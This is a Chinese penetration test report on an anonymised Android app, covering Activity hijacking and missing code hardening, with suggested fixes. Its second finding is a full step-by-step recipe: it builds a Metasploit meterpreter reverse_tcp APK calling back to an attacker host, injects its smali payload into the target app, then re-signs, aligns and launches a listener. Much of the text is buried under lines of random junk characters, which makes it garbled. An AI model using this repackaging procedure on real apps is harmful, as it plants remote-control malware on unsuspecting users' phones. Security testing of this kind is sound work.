7 Z7 F6 ~, A& v$ e1 M; g& V- S; s4 O
表1-2 测试结果
$ O" f [; k; V; D( Y7 Y
* V' A, H9 x: G6 W2 {- f. {" ]# t
: f' P$ ?4 s( h H& W/ R$ e4 B
/ k+ ^* e8 x* c L9 B- D$ K) q: _ % |; P& M! ~* ?$ h( m; p) H% K+ \
4 X, K" a+ Z6 h/ t3 U
" N4 V' K" x2 ~# u# v4 U. Q
% _& k/ y1 `. z6 a2 w) X
" S3 Y, V* u+ k7 ~
3 M! s! l% J* \2 h2 H" ~
$ t4 o( L0 D1 w) n8 M: Y, x( b
' }- i: [# W4 v 2 检测结果 7 v8 `0 B/ d$ Z7 t$ k
) X+ ^$ L) ^1 X, D" i
: ~) U2 j1 w1 }2 F8 K. R
9 n4 r% v4 o- q' j3 B1 }( M
2 k m) _9 l$ k v j/ @6 d
0 c( a _0 ^9 G S 2.1 某某某
8 M) i5 \/ d4 X' ?# B" K9 W9 @( w" Q) B
8 ~4 [: ]+ T) e F, K
! e8 w9 M- D3 }" y
( [ l$ m: i1 B2 R- P3 P6 ~$ G- [4 h' S2 \/ L
2.1.1检测目标 9 b6 Y3 r1 |9 j3 Q
" n7 G$ u, t' X# u9 [
( P5 ~% R" O0 {) W% k6 I
9 e8 [7 N& F, U1 f2 L: }3 m
6 B* G8 p3 S' f/ f+ M! k: k
* L6 T t! m0 t" u+ \ 目标地址: 某某某某某某APP 9 g3 f3 ~( i+ X
; q, K0 z: P3 ^' [2 Y+ h
. g* J2 C) Z0 R$ }' n* g6 Z9 v- f5 ~% v. L( V# V1 @" h
" d0 Y+ ^) ?0 k
[; s" L3 \- h8 u+ ~3 C C2 F1 K 2.1.2检测结果
; w% V7 Q2 V5 w9 {3 B* Y4 @# y% I: w9 J) k
+ U* `4 f# T2 @$ y* g/ |4 t W" ^# O' n
6 w& c! ?" C( i8 K
S* o1 E/ }4 P! U4 I4 j* R
2.1.2.1
0 R- J' E5 `# `3 X% M1 ]6 @7 f9 N
( Y9 e& \3 A# t C3 [3 ]
) _1 r, R& ]2 ^4 e3 g" u' n5 @% Z7 D
) ?1 y. b# Z) H" \! p# \
, u3 _- b" v# g, v& d# m% k
漏洞链接地址:某某某某某某APP
" Q2 n) t+ D, E, r" O
! H" _5 T$ k3 ]' n
" z7 f9 g% g, W) q$ w& W9 e# Q
8 E8 T/ [( _; t+ a* K2 I: h * f k D- P5 a# G( _
: c, k6 Q+ M+ q, e; Q 3 W5 v$ t1 b' O& Y* O* F
% g0 ^8 Z4 P+ n$ o
, e- c% w* Y- |7 F6 ^5 r- ~ `- J& x
/ f% q" M/ i# h& q & ~+ p) _- K. t m! H. C" Q
% Y6 R' ]' w: W* M* d3 ? 漏洞分析及取证: 7 N+ `' {/ ]2 X3 z) u# [" z
8 ?4 B9 O1 `8 Z' T& T$ e7 r
7 |; d( f9 F# j, C$ R( o+ A
7 B2 z, b2 o2 g* a
4 E" Q% g. z! J1 J3 J8 n/ ~$ Z; E4 `' U; x3 T5 v. A' j
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
8 R1 q1 d' t' S" A) M5 n" b
5 F j5 w ?) a7 L" k+ [8 V) v
e; l5 f8 H) c2 ~9 Y) ~ o. z) H" H) z/ s1 @+ c6 H
% E1 u6 N3 J! W. K8 p T
/ P; z* U0 l0 l, N: x
: ]; t3 f ]9 D: S5 P* u( { S
, u) A8 f; C. q( W
2 Q9 Z( {* ^; y) }2 P& D
b5 h5 F. P& n7 U3 ~ 7 E; ~" i- y- K r _) ]" s
" i# C3 i, _* e4 H7 }' i
K- _ V8 c" k' N8 ?- a$ ~ ^ g2 w- v
" i5 y! a' N$ Z; b2 h0 c& {& _) C) Q# o
. h: @. b' m& O7 u5 e3 u% N, ]9 c* Q
; ^. N0 n3 d( I9 `# z9 q
$ P1 w R: r/ k! Q% @( [" D
& C7 t! V5 _: t2 Q$ t2 W! y
( x) J4 L3 y* }9 Z! J4 o* R2 [" W `1 V3 h. _( v
N- _' H5 K4 s" F/ {$ A- [- Q. j! D+ F+ S6 L* H5 s5 i1 E
B3 `* j7 N. }. {7 G1 i) \1 M6 N" t! E# f7 |% l1 o4 W
$ A6 A& h: [0 i' C1 r' w
# H, A ]9 `/ ~" R7 `2 s ) H- M& \' h, J# o8 K
( u6 c0 _% _2 i" h. Z; \9 c
/ Z8 R& B) P) o; W! l; }1 |+ u
/ N" r4 I) n5 U3 n5 i$ f! _
0 H# q5 a; Z4 ^1 R. [
0 x/ B& \! J$ c, F
* A& h R$ e' C7 r6 Q* V, U4 B. u8 q( c9 [
漏洞危害:高
4 z1 Y- Y% {) s3 Y1 |$ f0 v( h
8 v0 J, h+ G2 A4 Y( v: m5 G) n' I
t1 B/ W8 `# X8 x. Q% P y3 h6 |) Y" v7 U# n! s
; u7 v V- p; `, i+ O
& E: _* @/ V, ]3 c
# Y/ R8 `' Y) U! n6 O1 c" ?# h' a( }' _( D
) F& X3 Z2 b# d$ j2 N8 z
7 p& B6 I( @" k
7 a& o& T5 ]% Z% ?$ R; V
+ _ U; l* [/ V* q* H" A; N# {6 [3 l
|
: v- ]- Y0 c2 }$ G7 R: ]
) S C- f% ^ ? $ R9 a* x8 t* p5 t5 @" d
. ] c1 R0 ~5 ]; ~0 W3 M2 B
严重程度
; A4 x1 o+ l" z5 ^) S8 e( G5 {3 M6 y W1 h4 w
! R( T% ?) i& n; Z6 n
$ i1 u+ p b- n( ]5 M7 v
|
' ~/ a7 ?) U$ k: T8 Q) ~" S
/ ]+ y% P0 E" `' h1 H2 o$ D' N
9 a) G2 E, E8 W( j* g: ] Q% x7 ]2 w/ ]% }) c! k8 q, w
' T6 X& E/ l O R! _# J( g0 j1 {% N, R- ^$ H& X F: i
高
0 t. m+ z! P$ a
+ O2 t; l% `2 f* f 2 n# G2 Z* S" ` a8 t6 ~
1 y: g; S) s5 B# M |
! x+ L% B# q( |' y2 K$ s4 ~4 B& G/ ~
+ Y" c3 U% j" V9 M5 z ' R4 P( b! S5 x0 X: g5 S
* D" G5 J8 Q! F! I, b! k$ k
: {, W4 y. R% n" b4 ?
- d* {) J5 o: o1 \ j, g& } ■
3 a1 u& B8 U& w: u1 o! Y5 D, L! l; g% k& t; C L
9 B( `* l8 h- f! G
6 |. e( h. _$ \. [' t* H |
. K: e/ I4 b x
8 e- m9 h. n- F: z3 U
- P6 `9 ]) k4 S
( K! r3 I& a# O _* h: G 9 n/ X. r; T7 U$ I. T) L& o7 b
: \3 t! [& C- A 中 % {9 }" Q, m5 S5 p4 x% f$ d
4 V" {( _" W/ L8 F, U6 x: N
1 l7 ^* a. l$ A+ a0 Y2 L
# c) Q' [, l3 M: c8 J0 U( f# J | + @9 D% i! C) N8 O9 m# a
( g. V) J$ I# x6 K2 W8 i
J2 ~9 a, c; @4 r
* z1 \% E, a$ L* o0 p! n
* {( w# a1 w7 m0 D0 F
; }' s$ w) [/ b' a3 x
' V$ R, h$ ~$ u
6 E( V, E7 N5 ]* `* ?$ y6 o
. W$ A& z" c! g5 v3 R1 C# v% q
7 V# z- d4 r2 w! e5 v |
& Y: x% C: W. |& M( [5 n
* ]% c2 Y4 T% i- A T1 A # s- K5 K1 B! W
0 q0 f& k3 L9 N
+ ]9 I7 d1 B! [0 ^
$ Z* m0 z7 x7 m. X
低
, D$ t9 ^4 ?# v. `$ Q. w. ], T" q2 U8 g4 o5 Y6 B
4 a2 O8 A. T |
* {' W8 I* ~9 B- t' p" T
|
5 A0 J% w& }2 h0 M/ m4 K' D! {- c9 r% d) z: x
' @/ t1 k0 _( |, D8 T6 e
$ B9 E/ w2 i$ }5 E
* M; Y8 N/ z& g6 a+ l5 l
% s5 p0 q5 ]& ^, b ' T: f; f) y- r f" x/ ^- Z- K0 x( T. O
/ B. s) f' |/ j
1 o% R8 B' v* _* t# Z% v7 p* K7 g! Y6 c: G( g, F
|
/ {" j4 E* {/ j- L7 i$ m: q
: X5 E1 _3 l( D2 p9 v, N
9 a# g n$ f8 l& B [, U
4 u. W6 l5 t. U! K4 k! ?
( y) j5 D+ i L# D0 z( f. G8 U# y& P- W3 c" N8 ]
/ O0 ~. `) x# } q# p
; ^* Y0 _9 G3 L/ ]
F6 e3 H( P# x' h
; v& F9 s" n# n
; n2 E2 H& J0 o2 W: h
3 @" ?; x R/ S5 P. d + h S4 f: N, `3 @) }
1 P7 v* P+ a) y6 v
" \ L' e4 s6 |% [; `* t$ n( d
" e. f5 I8 r1 U2 E
W" D9 v; X# x. R
9 L) P$ n% p6 ]) b% f 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 1 V* b: w* P% A8 U7 ?" ]8 F
, X* I& r, w- K: X* E
7 I6 P3 x7 I; m% b% V3 v
( G5 v0 E# L" V! u. r3 P 5 q; V7 }' K( W2 f# V: G
# |, T7 w: G: g5 `/ ~
4 S4 j' r4 W3 y# G L# W; D/ z) f) D
5 N6 M6 J, j9 o" L/ q. ~
: j, P! _$ L! N3 \* G3 Q; R- a! ~
' Z( m0 J+ S4 e& M7 _ * [# F- E- o5 Z$ r0 l5 s
1 j3 t! i/ {- K( e$ P
1 u! s9 {- |& U8 |1 N- R; l0 W, d0 o& x. @3 h5 [4 s2 I+ \7 {
! K* u$ r" F" `5 g* ]% K
" y+ i- g4 }7 P6 n+ Y5 o* r% }0 O 5 k- G; K+ k' \
0 b; P5 Z3 _# a5 @. T2 J- }6 k 2.1.2.2 & ?: n7 W! P4 @. |% N3 r! X
* ]+ t$ k/ v3 Q0 h
: O7 o5 ?( p% f# }) S! R0 o, K
0 Q- F/ N) S/ s# G& k( j. ~/ h
5 l/ N3 T" w1 L% i X
0 q9 }1 i- n) E 漏洞链接地址:某某某某某某APP ; \' E9 H+ W3 B2 g$ t8 p) ^
8 `$ P# Y% R6 I! U" Z# W; S
' {% h5 v# U B# g2 P% q# U+ u2 c) j- Y a
4 w) y$ ?$ F7 y- ~% j/ j& B& l$ s Y, j z; z; p6 K
漏洞分析及取证: + t- [% E* R8 r# D6 }
, f* T4 J5 `1 f
: I- X6 H3 c( P$ y& ]( ?0 ~
8 ^( g2 x& j7 o- F
0 G' r0 l* F5 `' }
B1 Y/ O% r8 T# [ 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: ' j) J& w6 R5 Y- x* }7 q
: G+ _# ]' D0 Z# s+ g& F/ V
/ v0 A& u( ~% I* D; k' k. A, V$ l8 X6 ~
. ?* I/ U) a2 q" O V, T ^
/ H( Q/ I9 V3 B3 o, k3 f 用Metasploit 生成木马 apk
) ^) e( J* ?# `6 M! k Q$ _. L4 E2 V. A% N) g5 A
' d+ a. i8 K, h: M- \( M& K' \
% _. ~; t1 r% ^$ d, n7 D1 s
+ s" a2 @7 @* @* |, C- Y1 s1 Q5 V6 o4 c* ~& O( W% I
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 9 q. A- ]0 {9 o: p: Y2 b2 z" @. K
; i% `" J o! B! C6 M% S
6 E4 N: t7 q, D8 g4 }& M1 v1 N* m9 L* Y3 a
2 \7 t3 m! x% o+ ^( M
/ h) j- ]% N7 n/ u6 \8 @/ m7 x
反编译目标apk和木马apk % P) ~" A) X5 L* p
1 ^. P1 Q* f* U- h) J1 a; M3 G
, b. {6 f( i* k
8 g* f: I' x8 U2 g. I/ G
+ C$ ^. C5 H A3 B$ ^
3 N1 A5 r2 m9 J1 S; J8 \
apktool d target.apk
$ e: `$ r% u+ `7 A0 P
4 s) S7 m3 |6 h, m& h apktool d cockhorse.apk
' F; g f' ^6 u1 ]% S& l( u
+ O; O8 e5 z/ h' _! j; S8 C
3 ?! w0 R/ A5 n- u- S% s3 x# t
# I1 L2 c; K7 L+ {% d x
! O P( A' G! V# h$ j `$ [" a" b
& o, d/ Y3 P8 K! h' f1 v 木马 apk 注入目标 apk
6 X" K. L* z& p; s2 x& w4 _! _* A J9 Y9 ~0 Y9 u
5 L5 A) _3 m% {9 @
/ c9 [$ u8 x9 w# g+ z5 f1 _
+ X3 b& q; Z8 _) m
9 {- q( W1 Y# S" i 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
" E3 N) u7 r/ ^# E2 c
( R5 P9 }) j/ V* _- p: u invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
9 W+ g* ^2 Z; a% B* x
4 y! u8 N5 I& k. v' Y
9 ~/ V' @) F; M. M/ c! l5 H
) ~( u2 q; C) @6 a/ L ) G& B+ p I' ]5 I3 v7 R# F0 ]' M
: h7 C) f# Q# U" w+ c! b$ i; a" J& [ 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 1 c$ V% Q# g3 i
$ U: r! X2 N) ?6 [, p* q* Y
. ^" t- d/ k8 f2 S) I5 ^0 V- y0 X J
. Y2 R/ K% [9 [. F; h/ I4 b
# c. }$ b" k3 F8 {
! ^8 ~) e1 v( T6 Y: q* N/ z
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
- M P9 K7 Q, I- S0 B- _0 [, U* v" v! d- M" @
$ n% r. u0 o) F7 Y: V* K: |0 z% O( u
6 X! u5 M5 T5 y0 X2 M* r
0 N# i1 }6 S; E. I, r
- T4 R' T7 K& {; g, z* u- U" D 回编译生成最终 apk & Q ] u& S+ R7 o
3 b- d& k3 w$ z7 k
T$ K, n) T) Q1 r' a
2 h5 c1 `* X$ X1 r3 I5 h' s
, l: @! J$ P; g& n8 T
1 L$ n* h) x8 g; o. E2 f 重新打包
' L9 H$ |1 ^1 g9 w7 l7 {3 _$ L [0 [1 m
6 `! j. Z, P0 h1 W' a& k) Y- b
2 F6 q: i6 E* l8 p/ ]6 ~
& }& M. L. M" n" |* Q2 {( i( }
# X5 T u& P+ v/ R) N apktool b -o repackage.apk target_app_floder / L2 X+ S7 ^# i/ u, e4 E, C
D) n- N0 D A9 y9 D6 ~, E0 ~& L. r
8 d# t! S, k& i: r) u% S/ z8 ^1 q
# l, O' O# }$ \8 p% y1 ^/ z' J $ h2 C2 y3 Z7 t9 U& b6 q2 v
- l9 }0 k# ~, p, p/ p. V' {
创建签名文件,有的话可忽略此步骤 % i: h: B j- B9 Z: P2 Z- R
* K: \3 c! i% _) d! y
7 T4 Q- I. Z0 z& N& ]* e$ Z; W3 ? U2 I% ]
/ Q0 a2 g3 w2 z2 t& `7 }: N
3 Q) F. u9 ?! y; s7 k& A keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 ! u9 c. }0 n1 c5 k
) u; c8 |# h3 H: [
8 ~/ N" p# R% M( }
0 F7 }, o% P9 W0 M; A4 f+ N
, ~' ]5 g9 O0 j3 W
6 Z& t r- q' o4 ^( v/ N+ X
签名,以下任选其一
0 F/ E- Y1 D# i# h% [
8 S: I4 j [2 u; H. i; G
7 p- a. A" f( Z: g8 y
6 A+ `& m- @4 d
+ ~: @2 x0 l, P' E8 D% Q+ U
@4 C) d9 }0 d9 M jarsigner 方式 * ^! t; k" E8 b
3 S5 h) H% L$ {5 ^! z( a" M6 G2 j, A" }
, ~' y, `3 Q4 a6 ~$ e8 ^* n1 Z$ E. @1 b4 D: g ~
! S9 ^& | U- N0 Q0 F
+ Y6 L' B( V7 u jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
5 D, U( M. Z/ ~5 _& X+ _
9 E$ e. p6 {: w1 T
! V3 L) G/ c4 C
- ]; L; p; R. A8 Z( J7 M 8 @3 m4 ^* a6 Q$ P3 b% k# w9 G) k
5 C1 ]/ E0 S7 q# o
apksigner 方式 ' _" j t% h6 m: J
$ ]2 j) E- y/ d# S
* Z; |3 J0 }* l0 e- g) p* @
6 e" q# x/ d* K" j8 ?3 z
, w% W) \; k }5 r3 b7 _
% [# S' x: m9 a; T apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk ) z& k1 S: q. i/ \% T, t6 j
- \1 k; |* w6 K6 {
3 ]% |0 D5 Z0 f& o. s) m; p% R
7 O8 h3 y0 k6 _) Q# E8 s) K
y" E, d) I. c4 _- i/ l8 Z. S8 V4 |
2 e# K2 \- R( F2 p3 i3 Q) R/ L 如需要禁用 v2签名 添加选项--v2-signing-enabled false
' Z- o7 h* F! v# w( J: ?+ M6 ]3 V8 P+ I/ ]% M( B' P* ]2 V
- o$ v! n+ P) E
! V- U/ B" x7 R4 c
( y3 \/ m: q; o9 L: Y
7 f- H9 `% J( | 验证,以下任选其一
7 @/ Q) ?! z: Y; |/ r/ i& @; y9 H! }$ P: ~& S/ |
4 u' G5 V+ s6 b# L. a6 \
4 m$ G* ?. H, Y7 ^$ x. |+ c
( g6 C) A/ W2 p9 R6 s0 h$ i/ M- Q
8 N8 F5 }; y! K# z, j& o8 F0 w jarsigner方式
$ L5 S% B" B" g( w7 X8 i: t
( T9 b6 D! j( U9 ?. z) h
% k2 J1 D! W1 e- j$ ^$ z' v
$ K. C8 \. z4 s+ m " A `2 n5 k) c2 Q! c: L
. z/ ?" m6 q1 _1 x9 M
jarsigner -verify repackaged.apk
+ B2 B. {% s, j! z3 L3 j9 F8 U2 @7 U* v" c; { g0 I
* Q" O0 |! p- @8 _& P8 \( m0 F# ?+ n. U8 {; o0 v6 J
8 c5 z; a8 b# }! f
I9 s4 X. r+ F( A: { apksigner 方式 & V1 j; v. a, Q7 v( @
; m" e- e: z. o) D; u* K
3 t* }/ T) I Y' _# ]
/ B, ]$ N) j( Z- c7 c & q9 M8 m U9 K- Y. Y
! G v I2 O, E( R; |" C apksigner verify -v --print-certs repackaged.apk * I8 [& R* y+ O; G. W7 K% N/ T) a$ p4 w
0 V' N, j9 ~4 x4 ^8 z0 @8 q5 a
5 c4 `* {# U$ _$ r z* O* k, O* ^; s) D8 V2 m7 {: S
! N' t) w3 z" E) P/ e+ u' o
$ K" }8 d+ P4 ]
keytool方式 8 E" {. S+ c4 l, g( p# D
0 L' v0 n# `( d% q8 ~; y
# s* T1 w+ \# L E( w
, y& m9 S& r8 y4 V# f
0 @+ e8 K# j+ c1 {, V: T! _9 L
9 u6 X7 i, L" ?
keytool -printcert -jarfile repackaged.apk ! u0 o* ~! F% ]$ U& r1 X4 {5 x2 |
( S8 Y( D3 n; K
' H: `& |: `7 ]4 n0 p) e
, ^' Z& R7 T( @( k% F: O
/ A- d" B2 }* \; b- {# a2 R) q. }& y
对齐
" b7 x6 v6 t% H/ Q! y8 E: ~% ]/ J3 \# l& ]- m9 b/ J+ ~- U
8 S( W- i5 I6 j0 |# J1 S
) }& V' j7 t8 A1 f2 @ % B1 N' N \' ?, g
! c* R( ?( P; H4 c 字节对齐优化
% ]$ v6 N- Z( @6 `7 q% r5 {! d/ Z4 R9 Q& u
5 ?2 P4 ?$ F: Q3 [
! s( i( k/ U; ~' D - m& k4 M/ p, R) y
0 v( ^( _* B/ s( z4 R zipalign -v 4 repackaged.apk final.apk
2 [! v% D5 Y0 h1 ?: q* m# F2 J; g2 Z9 q/ B8 y
+ @ Z. J. n$ B- A, F, |0 a& N# i4 j+ a
6 _- ~. O" l5 k5 E) O6 ]. ?
" A) v9 ?% p9 L! \* c) Q 检查是否对齐 9 o0 Z9 i; h* @2 e
7 h( Y5 R% O2 k+ ^1 N
: G/ m- o" U! b% V
: ]7 {3 ~" w, _! N: p . i# ]! I- i/ @- y( E7 \
! i: b- D9 D* e
zipalign -c -v 4 final.apk % L7 r1 Z9 v1 S; f5 F5 d
+ ?# L5 G* _1 Q7 U0 `7 E1 d% [
* E9 E; C2 _8 X% h; o. q. A: I* V v' Q* c
$ z5 }; k2 O% f4 @) _& v7 T
2 a" o0 t( i. h% H9 z( i 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 9 _) P3 Q1 ~: V# M$ e: {9 J9 k. W
. d0 k8 _. I+ x1 u# z: \
" P, W2 e9 r3 e" o
1 K5 N$ G9 U( I8 {4 z
: U/ E0 k7 |- ~5 `2 Q! W1 o; K
2 _0 H& Z. s% P$ R( i/ G 启动Metasploit控制台,配置参数等待上线
4 x5 B' Q% `' O. C5 e+ p* j9 Y4 w! f
1 a$ s$ z& @+ g2 F
/ I8 e7 q% @. p' [0 r, o- X
. D3 k T; w$ A; y5 P) F0 }! v5 s& a. _( m, B$ f0 @+ l
在终端依次输入如下命令 Y" {" }* w) V+ L5 Z# a/ {
/ J( W1 C) c4 y; a
8 F z7 @# c4 _1 \, z; u) b3 n, w# c! y* f( I- t
* a9 r" t2 s% i! g V1 Q# M; ?
8 Q9 A; D9 d* z5 B
msfconsole
% k w* Q0 G6 k8 w% S" x# Y0 q X* Z' d: k! W1 x
3 v4 l2 @; l2 ~0 y5 z$ P
8 c8 H( q/ S6 k( r' ~6 _* ^2 N R
& C( H! [( t& K( Z" g* q7 @4 v
4 Z# C! h, b8 c) P$ M6 E3 A2 ~( e use exploit/multi/handler + v" u5 q( v1 Y% z4 E4 M8 O0 r
$ H u7 v/ D) k3 M. z2 M
) t. V- w: U& D4 \( J0 C
4 P- R- `$ I g S+ @ 3 R& A" e1 g: R1 B6 D
* X4 e3 V7 E) S. ~ set PAYLOAD android/meterpreter/reverse_tcp ' v0 a1 S+ W) |5 T& [
9 D/ f( y- ]; G9 S+ g
7 \ {0 h: u) c: A7 m/ Y
7 x" o" B& s( v1 c6 Z- h4 m+ i. _ ' f% f( \6 x1 V7 w4 }' t1 n( ^3 M
( f& S. f, J d% N: E4 o$ S
set LHOST 192.xxx.xx.xx
) y: S; X" U, R7 h4 e3 E' b8 F" c9 J: S
+ X/ o2 s# C. k
' a x1 m1 }2 Z
- C! F2 ?4 `. I3 o& H9 b
) O: |: v+ |: H P6 C set LPORT 4444 : X2 J: _, U2 p3 O8 G
7 }; Z" ?, T, F* e, X' p/ ?
3 v+ d) y/ m$ g' |! v
, }6 ~ X5 o6 s4 E+ t# a
8 |7 k, {' m5 C9 C
" W8 o9 P% l: J8 E' }: A exploit 8 F" S- p7 c' k1 q' q B7 X
# v& n4 P6 ?4 [2 i( h1 C# T8 ]
& t, V' g" H$ O6 n7 {! y
7 N. N1 }/ F9 f) y* o/ B' j
- A4 k( X: \$ w, i# I8 U
! `0 k0 B' C9 q( q; O# `2 X
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
1 Z7 a6 D$ f% ^9 F7 R9 Z! M
, J8 z5 i- @$ |$ O# V; m, g
% K. F# d; l) e+ z: J* B) w Q' h Y5 @, w( j% P
d! T. H/ c3 e( w; L
" A3 q* c4 `$ o7 ]3 b
漏洞危害:中
7 s, D6 o; s8 c5 G8 @1 u9 x2 ^: o* l5 `9 f
7 Z9 K+ m* K, S3 @( H) k c5 a" u$ p. @! F" e. k% \4 e5 f
, ?6 C. |& C4 R, [" w9 C) {& l
0 E+ }4 [& [2 r4 T
% j# ^/ F/ y. u+ f3 m# W# P+ ]6 G" } e% T
/ B+ L' N0 Q# r) o# O4 w% _8 v
( f! k. w! }$ O5 e, p1 | 2 d3 P6 C6 U4 d+ ?) T
9 Q: b) v# y3 X3 p. }
* H" e4 ?) P7 X$ Z* c. s+ ~3 i. N
; g" [' a' p" u9 Q* a/ n s C! n | , _' y9 T/ j0 K, O8 ]: N
) ~" I' L* ]4 [' E6 j
7 K8 r6 C. J6 P8 ~9 A+ J0 {' V3 l7 m' ?) w6 Z9 V( ]
严重程度 n3 o: a5 q k- I
6 E2 m+ _. O6 u5 S
+ t+ P, D& T1 S: e0 l& M7 ^
' H4 ^8 g. h" Y( k0 P3 B1 j0 C | 0 Z/ q6 N3 Q/ A: }- t* P2 |5 w
' ~- \" M, X( @" D- T) r" Z
0 G8 l) `& H" z% @
! S1 ?0 H2 s0 i5 K2 Z- T! c5 H ~ 1 H @/ }! S5 x9 g0 u, Q% `
$ ?$ _9 E2 _8 \. E$ h6 u4 a 高 8 B8 e0 e7 X2 \' B+ H1 A. s7 `
+ G" f9 i5 {% ]* A
2 K' n* {# `4 j% U5 }1 D9 L
( h. R) Q6 o9 e' H& z9 R | $ k$ T, x9 I# L0 d
$ O1 E% N. L% V; @/ R1 l
: D# v; o. [- J- u
4 V0 E+ M' X+ X) q( J& Y- O/ K h, m' g2 \; ^9 N, Z5 m; d1 T
( k0 U8 D! p, T9 x ■ 2 s% U& y$ I8 l7 J; D
( `8 Z2 y! z o+ C0 N z) W
3 L3 t9 g0 a; r% ~# m& m# U |% c( A( j# k/ X! ~/ t' z. J
| 1 F# @3 w. g5 g1 J$ V3 _
! x: p n. m/ ?. ?' g 8 O% X5 _* U$ M/ j4 ?' x3 v" {
* ~# b. v" n+ J' t# ~2 x5 ?" c, K
- C- ?9 e% v w. |8 E5 B. A0 Q0 k8 n6 E
中 : X3 \! f) Y8 q- t
: v' ] ]' N7 O) T7 t: X- k* x' T ( o4 w, M+ Z M$ W7 f0 m! ?
$ Y1 `- s1 e' k m5 X1 Q
|
+ Z% L( X+ q! L9 }7 A
# o$ R$ |: p6 {# f: {& ] ; P# P y" ?1 t! f" G
% o& {0 R: d% h' J+ V
' q' Q2 l8 b% y. i, z8 \
, J7 b1 }- C' o) ~$ k0 [
# _4 [7 y/ U* g, c
( c- X! h$ v. a6 t( { 4 q- f W& H+ K0 Z+ ^5 b
( g: x; p. J+ ~7 R' v6 D/ _2 |
* i1 r/ q4 c& w3 ?
2 d( E+ V8 C& f s+ T | - W1 o# U' C7 Y9 _. @
G( c- p- V9 B( ] : u0 E5 \+ a! X
; R: c T" a1 X
3 F9 @* |0 y$ |0 y+ U9 [
& E& Y. U+ s! @: u& a/ g; i. ` 低 % L, U1 _$ j6 L+ s% z
2 q- K/ i( C8 D7 F * I- R4 ]( ?. N
% Q2 d3 j2 V, f7 k
| : X0 y) d+ g! W6 q6 c9 l9 t0 j# O
; w" `4 ~* B0 C; ]& t: G* g
7 `) W9 J K( a) ]; O' I# X! ]
' ~! R. _- f2 t* B7 {3 {4 b# W
7 `# f: E: s! g% s" w, X C5 v) y6 @3 U7 j6 g
" y, X& v7 n1 i5 s' |2 g
! D' N' D" e9 u0 X0 l' o5 x9 `5 k % v6 A5 ^ \( N9 w' ]$ L4 r6 O
6 K4 ^7 ]. M0 L1 F
$ `! F5 u, i& d1 b! |2 K* j1 {0 {/ m# F' y6 H& c Y
| . Q' A- A# v) k' Z) d+ \( K
5 Z% r/ I6 w' L+ H
, |. A6 f' o& d9 h' t1 }7 b- }2 r& C2 k6 v$ Q3 O
. E; p8 y5 O; M: H8 A' ~ b3 Z( [! r+ b( }5 H4 n# W
" R! U6 t' b4 }4 X0 b3 W3 X# o. a6 \% L u1 Q2 X1 a1 z
$ j4 V: k7 j8 X& b' }
5 S ~% a7 \8 H9 m( S2 G7 q2 _
, Z6 c7 \0 ~3 k6 y3 i2 p/ i) T1 w3 M
& k( c: m. @) S% ^6 B) L9 i9 f
3 _! K- |, [! f3 \
# R. M$ j8 |9 K7 M& t& m
; X: m# S8 V9 [" C6 D
6 f5 ^6 A* ?0 K# C8 q+ o
4 m4 r3 n& D) l% P
修复方法: x. y2 Y8 T$ x c4 h9 t
# C2 Y" l* q+ L5 ^
m" A4 Y. ?1 w% {" P9 J
6 Q6 B* S0 ~& [: o
5 b! w& n7 n! c& U/ O
* D3 G' g; ?; k& d. l |$ `
1.在 APP 启动时应做签名校验防止二次打包。
: C& V% z2 k. y! `4 V6 O- W/ a/ I0 T" R2 d. E R* K
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 + A1 W# F1 F- J$ v8 C; T
9 C0 i- a" ]; S5 x6 q, N
" ?) M$ e7 U" E7 d2 K! T" b! e+ N! ^4 G- n# |$ K. f6 W% g
, I' `5 P' v1 {" T/ P* \6 @1 S o2 q
, O& H. g5 ~, b) A+ V
# D, x+ b0 o, G* V" u9 O
2 g/ l( y( A$ S* y- k3 k
; D2 F( |9 r# S# G ]) G
k. Y) @/ B; m `# \
. v/ E; c' C- L) p+ X. \ ( `6 w6 K7 T+ X( d
2 H8 {' ?$ y! ^3 R+ p : X; v) D% k- z9 L5 k" l4 l
7 e& S: [: y" s$ z
5 P' {+ O: L, i( E
/ P9 s3 q2 W) o) O7 D0 q
/ Y6 G5 g) ?8 t# y$ }4 y+ ^# Y: p